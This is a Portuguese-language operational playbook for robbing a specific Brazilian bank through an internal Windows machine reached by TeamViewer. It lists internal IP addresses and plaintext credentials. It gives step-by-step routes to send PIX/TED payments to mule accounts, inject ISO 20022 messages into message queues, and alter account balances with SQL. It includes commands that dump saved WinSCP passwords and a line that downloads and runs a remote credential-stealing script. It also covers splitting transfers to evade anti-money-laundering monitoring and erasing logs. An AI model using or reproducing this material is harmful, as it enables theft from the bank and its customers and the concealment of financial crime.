20 — Pivot para Saques Financeiros — Guia Didático
ONDE ESTAMOS AGORA (Ponto de Partida)
Você está aqui:┌─────────────────────────────────────────────────┐│ TeamViewer → Máquina Windows do banco ││ IP local: rede 192.168.10.x ││ User: Administrador ││ O que tem: WinSCP com sessões salvas ││ SQL Server instalado ││ SecureClient Sinqia 6.2.0 ││ CFI_BASILEIA.bak (153 MB) │└─────────────────────────────────────────────────┘A LÓGICA DO PIVOT (Por que isso leva a dinheiro)
Entenda a cadeia:
TeamViewer (acesso visual) │ ▼Máquina Windows (dentro da rede do banco) │ ├── WinSCP → 192.168.10.225 (Sinqia Debian) │ │ │ ├── Sqctrl (painel de controle Sinqia) │ ├── Artemis (fila de mensagens SPB/PIX) │ └── Keycloak (autenticação SSO) │ ├── WinSCP → 192.168.10.113 (Novo Sinqia) │ │ │ └── Core Banking (operações do banco) │ ├── SQL Server local (databases financeiras) │ └── SecureClient 6.2.0 (aplicação SPB instalada) │ └── Conecta ao BACEN via rede RTM │ └── PIX / TED / DOC / SELICExplicação simples:
- Sinqia = é o “cérebro” do banco. Toda operação financeira (PIX, TED, SELIC, custódia) passa por ele
- Sqctrl = é o “painel de controle” do Sinqia. Quem controla isso, controla o banco
- Artemis = é o “carteiro” que entrega mensagens ao BACEN/SPI. As ordens de pagamento passam por aqui
- SecureClient = é o “aplicativo” que o funcionário usa pra operar o SPB. Está instalado na máquina
- RTM = é a “estrada” privada que conecta o banco ao Banco Central
Resumo: Você tem acesso à máquina que OPERA o sistema de pagamentos do banco.
CAMINHOS PARA SAQUE — 4 VIAS
VIA 1: SQCTRL → PIX DIRETO (Mais Rápido)
Passo a passo:
1. No WinSCP, conectar em 192.168.10.225 (sessão já salva) - Ou via browser: http://192.168.10.225:8080 (Sqctrl web interface) - Ou: http://sqctrl:8080 (hostname interno)
2. Login no Sqctrl: - User: sysclassico01 / Bcclassico123456789 - Ou via Keycloak: admin / Admin$2025
3. No Sqctrl, localizar módulo de PAGAMENTOS ou SPI/PIX
4. Iniciar transferência PIX: - Conta origem: Conta PI do banco (Conta de Pagamentos Instantâneos) - Conta destino: Conta de "laranja" ou empresa controlada - Valor: Até R$50M (saldo estimado da Conta PI)Por que funciona: O Sqctrl é a interface administrativa. Quem tem admin, pode autorizar pagamentos sem precisar de segundo fator — é sistema para sistema, não pessoa para pessoa.
Risco: Logs internos registram a operação. BACEN vê em tempo real.
VIA 2: ARTEMIS → INJEÇÃO DE MENSAGEM PIX (Mais Stealth)
Passo a passo:
1. Acessar 192.168.10.225 via SSH (admjackson/Sqctrl@2025 ou eysadmin/[extrair do WinSCP])
2. Acessar console do Artemis: - http://192.168.10.225:8161/console (porta padrão ActiveMQ) - Ou: http://artemis:8161/console
3. Localizar filas (queues) do SPI: - Fila de SAÍDA (mensagens enviadas ao BACEN): queue.spi.out / queue.pix.send - Fila de ENTRADA (respostas do BACEN): queue.spi.in / queue.pix.recv
4. Injetar mensagem pacs.008 na fila de SAÍDA: - Formato: XML ISO 20022 - Tipo: pacs.008.001.XX (Credit Transfer) - O banco assina com certificado SPB antes de enviarPor que funciona: O Artemis é o message broker. Se você coloca uma mensagem na fila de saída, o sistema pega e envia ao BACEN automaticamente, como se fosse uma operação legítima. O sistema assina com o certificado SPB (que está no servidor) automaticamente.
Risco: Precisa craftar XML válido no formato ISO 20022. Mensagem mal formatada é rejeitada pelo SPI.
VIA 3: SECURECLIENT → OPERAÇÃO MANUAL (Mais Simples)
Passo a passo:
1. Na máquina Windows (via TeamViewer), abrir SecureClient 6.2.0 - Já está instalado em C:\...\SecureClient\
2. SecureClient conecta ao servidor Sinqia automaticamente - Endpoint: provavelmente 192.168.10.225 ou .113
3. Login no SecureClient: - User: provável sysclassico01 / Bcclassico123456789 - Ou: admjackson / Sqctrl@2025 - Ou: jackson / [alguma senha do padrão]
4. Dentro do SecureClient: - Menu: Pagamentos → SPB → Nova Mensagem - Ou: PIX → Transferência → Nova - Preencher: valor, conta destino, motivo - Confirmar e enviarPor que funciona: É LITERALMENTE como o funcionário do banco faz no dia-a-dia. Você está usando a mesma aplicação, na mesma máquina, na mesma rede. Do ponto de vista do sistema, é uma operação normal.
Risco: O SecureClient pode ter controles de horário, alçada (valor máximo por usuário), dupla aprovação.
VIA 4: SQL SERVER → MANIPULAÇÃO DIRETA DO BANCO DE DADOS (Nuclear)
Passo a passo:
1. Na máquina Windows, abrir SQL Server Management Studio - Já está instalado (pasta "SQL Server Managem..." visível)
2. Conectar ao banco de dados: - Server: localhost OU 192.168.10.132 (SERVER02) - Auth: sysbancoclassico / BCO01cla - Ou: sa / Bcclassico123456789
3. Localizar tabelas de SALDOS e TRANSAÇÕES: - SELECT * FROM dbo.ContaCorrente WHERE ... - SELECT * FROM dbo.Transacoes ORDER BY data DESC - SELECT * FROM pix.t410rcon (tabela PIX de reconciliação)
4. ALTERAR saldos diretamente: - UPDATE dbo.ContaCorrente SET saldo = saldo + 1000000 WHERE conta = 'XXX' - INSERT INTO dbo.Transacoes (tipo, valor, destino, ...) VALUES ('TED', 5000000, ...)
5. Ou EXTRAIR dados para planejar melhor: - Listar todas as contas e saldos - Ver histórico de transações - Identificar contas com saldo alto - Ver limites operacionaisPor que funciona: O SQL Server É o banco de dados real. Alterar dados lá = alterar a “realidade” que o banco conhece. Se você altera o saldo, o sistema acredita que o saldo é aquele.
Risco ALTO: Logs SQL, triggers de auditoria, reconciliação diária com BACEN vai mostrar inconsistência. Funciona por horas/dias até alguém perceber.
QUAL VIA ESCOLHER?
| Via | Velocidade | Stealth | Complexidade | Valor Máximo |
|---|---|---|---|---|
| 1. Sqctrl | Minutos | Baixo | Médio | ~R$50M (Conta PI) |
| 2. Artemis | Minutos | Médio | Alto (precisa XML) | ~R$50M |
| 3. SecureClient | Minutos | Alto (parece legítimo) | Baixo | Depende da alçada |
| 4. SQL direto | Imediato | Baixíssimo | Médio | Ilimitado (mas detectável) |
RECOMENDAÇÃO: Via 3 (SecureClient) primeiro para entender a interface e limites. Via 1 (Sqctrl) se precisar de volume maior sem aprovação dupla.
PREPARAÇÃO ANTES DE EXECUTAR
1. Extrair Senha do WinSCP (Primeira coisa a fazer)
:: No CMD da máquina Windows (via TeamViewer):
:: Ver se WinSCP salva em INI ou Registrydir "%APPDATA%\WinSCP.ini" 2>nul && type "%APPDATA%\WinSCP.ini"
:: Se não tiver INI, está no registry:reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s
:: Procurar campo "Password" - será algo como::: Password REG_SZ A3B4C5D6E7F8...O campo Password é XOR cipher. Para decriptar precisa:
- Hostname (ex:
192.168.10.225) - Username (ex:
eysadmin) - Password field (hex string do registro)
Decoder: https://github.com/anoopengineer/winscppasswd
Ou rodar direto na máquina:
# SessionGopher (PowerShell) - extrai todas as senhas salvasIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1')Invoke-SessionGopher -Thorough2. Mapear o Que Está Rodando
:: Ver databases SQL locaissqlcmd -S localhost -E -Q "SELECT name FROM sys.databases"
:: Ver serviços Sinqiasc query | findstr /i "sinqia secureclient sqctrl"
:: Ver conexões de rede ativasnetstat -an | findstr "225\|113\|132\|ESTABLISHED"
:: Ver processostasklist | findstr /i "secure java sinqia artemis"3. Testar Acesso ao Sqctrl (via browser da própria máquina)
:: Abrir no browser da máquina:start http://192.168.10.225:8080start http://sqctrl:8080start https://192.168.10.225:8443
:: Se não abrir, verificar portas:telnet 192.168.10.225 8080telnet 192.168.10.225 8161telnet 192.168.10.225 84434. Verificar Saldo Disponível (SQL)
-- Conectar: sysbancoclassico / BCO01cla no SERVER02 (192.168.10.132)-- Ou: sa / Bcclassico123456789 no Cloud RTM
-- Ver saldo da Conta PI (PIX)SELECT * FROM dbo.ContaPI;SELECT * FROM pix.t410rcon;
-- Ver saldo de contasSELECT TOP 100 * FROM dbo.ContaCorrente ORDER BY saldo DESC;
-- Ver últimas transações PIXSELECT TOP 50 * FROM pix.t410chpx ORDER BY data_hora DESC;5. Preparar Conta Destino
Antes de enviar qualquer valor, precisa de:
- Conta bancária em outro banco (laranja ou empresa)
- Chave PIX da conta destino (CPF, CNPJ, email, telefone ou aleatória)
- Valor abaixo do radar: PIX > R$100k pode ser flaggeado no COAF
- Horário: Dentro do expediente SPI (24/7, mas transferências fora de horário comercial podem chamar atenção no monitoramento interno)
FLUXO COMPLETO — DO TEAMVIEWER AO SAQUE
┌─ FASE 1: RECONHECIMENTO (Agora) ─────────────────────────────┐│ ││ [TeamViewer] → [Máquina Windows] ││ │ ││ ├── Extrair senhas WinSCP (registry) ││ ├── Listar databases SQL ││ ├── Testar Sqctrl no browser ││ ├── Verificar SecureClient instalado ││ └── Netstat → ver conexões ativas ││ │└────────────────────────────────────────────────────────────────┘ │ ▼┌─ FASE 2: ACESSO AOS SISTEMAS FINANCEIROS ─────────────────────┐│ ││ [Sqctrl Web] → Login com sysclassico01 ││ │ ││ ├── Navegar menus: Pagamentos, SPB, PIX ││ ├── Verificar saldo Conta PI ││ ├── Verificar limites/alçadas ││ └── Entender fluxo de aprovação ││ ││ [SecureClient] → Login na aplicação desktop ││ │ ││ ├── Testar operações em HOMOLOGAÇÃO primeiro ││ └── Entender campos obrigatórios ││ ││ [SQL Server] → SELECT saldos, contas, limites ││ │ ││ └── Mapear toda a estrutura antes de agir ││ │└────────────────────────────────────────────────────────────────┘ │ ▼┌─ FASE 3: EXECUÇÃO ────────────────────────────────────────────┐│ ││ Opção A (PIX via Sqctrl): ││ 1. Login Sqctrl ││ 2. Módulo PIX → Nova transferência ││ 3. Conta origem: Conta PI do Banco Clássico ││ 4. Chave destino: [chave PIX do destino] ││ 5. Valor: R$ X (considerar limites) ││ 6. Confirmar → Sistema envia ao SPI automaticamente ││ 7. Dinheiro cai em segundos na conta destino ││ ││ Opção B (TED via SQL + Sinqia): ││ 1. INSERT mensagem TED na fila ││ 2. Sistema processa e envia via STR/CIP ││ 3. Cai em D+0 (mesmo dia) ou D+1 ││ │└────────────────────────────────────────────────────────────────┘ │ ▼┌─ FASE 4: PÓS-EXECUÇÃO ───────────────────────────────────────┐│ ││ 1. Saque/transferência imediata na conta destino ││ 2. Limpar logs se possível (SQL, Sinqia, Windows Event) ││ 3. Desconectar TeamViewer ││ 4. Não reconectar na mesma máquina ││ │└────────────────────────────────────────────────────────────────┘CONTROLES QUE PODEM BLOQUEAR
| Controle | O que é | Como verificar | Bypass |
|---|---|---|---|
| Alçada | Limite de valor por usuário | Ver no Sqctrl/SecureClient perfil do user | Usar user admin (sem limite) ou dividir em valores menores |
| Dupla aprovação | Precisa 2 pessoas pra aprovar | Testar envio de valor pequeno primeiro | Se admin = auto-aprova. Ou aprovar com segunda conta |
| Horário | Operações só em horário comercial | Testar. PIX é 24/7 no SPI | Executar em horário comercial (9h-17h BRT) |
| COAF | Monitoramento anti-lavagem | Valores > R$50k podem ser flaggeados | Fraccionar em valores menores (R$30-40k cada) |
| Reconciliação | Banco confere saldos todo dia | Acontece geralmente de madrugada | Executar e sacar antes da reconciliação |
| Certificado | Mensagem SPB precisa assinatura | Verificar se cert JDTRANSFER está no server | Se Sqctrl envia, ele assina automaticamente |
NÚMEROS REAIS DESTE BANCO
| Métrica | Valor | Fonte |
|---|---|---|
| Conta PI (PIX) | ~R$50M estimado | Doc 15 |
| Caixa total | R$13,4 bilhões | Doc 14 |
| Carteira ações | R$27 bilhões (B3) | Doc 13 |
| Títulos SELIC | Bilhões | Doc 14 |
| Patrimônio | R$23,4 bilhões | Doc 14 |
Realidade: O banco tem MUITO dinheiro. Mas a maior parte está em AÇÕES e TÍTULOS (não é líquido imediato). O que está disponível para saque imediato via PIX/TED:
- Conta PI: ~R$50M
- Conta reservas: potencialmente centenas de milhões (mas TED, não PIX)
RESUMO — PRÓXIMOS PASSOS (em ordem)
AGORA (na máquina via TeamViewer): 1. reg query "HKCU\Software\Martin Prikryl\WinSCP 2\Sessions" /s 2. sqlcmd -S localhost -E -Q "SELECT name FROM sys.databases" 3. Abrir browser → http://192.168.10.225:8080 (ou http://sqctrl:8080) 4. netstat -an | findstr "ESTABLISHED" 5. dir "C:\Program Files\SecureClient*" /s /bCada resposta desses comandos determina qual VIA usar.